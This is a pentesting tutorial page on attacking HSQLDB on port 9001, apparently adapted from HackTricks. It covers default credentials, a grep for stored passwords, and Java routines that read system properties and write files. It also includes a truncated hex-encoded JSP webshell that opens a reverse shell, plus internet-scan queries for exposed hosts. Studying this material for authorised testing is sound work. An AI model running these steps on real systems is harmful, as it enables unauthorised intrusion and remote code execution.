--- title: "9001 - Hsqldb" weight: 9001 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **9001 - HSQLDB** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 ## 9001 - 渗透测试 HSQLDB ### 基本信息 **HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. **默认 port:** 9001 ```text 9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) ``` ### 默认 Settings 注意 that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges. 默认 credentials are usually `sa` with a blank password. If you’ve exploited another service, search for possible credentials using ```text grep -rP 'jdbc:hsqldb.*password.*' /path/to/search ``` 注意 the database name carefully - you’ll need it to connect. ### Info Gathering Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials. 注意 the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`. ### Tricks #### Java Language Routines We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath. JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement. If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement. #### Reading Java System Properties Create function: ```text CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty' ``` Execute function: ```text VALUES(getsystemproperty('user.name')) ``` You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). #### Write Content to File You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **注意 the maximum size of 1024 bytes**. Create procedure: ```text CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename' ``` Execute procedure: ```text call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024))) ``` --- --- --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="9001" ``` #### Shodan ```bash # Shodan 搜索语法 port:9001 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:9001 ``` --- ## 📖 参考资料 - [HackTricks - 9001-hsqldb](https://book.hacktricks.wiki/en/network-services-pentesting/9001-hsqldb.html)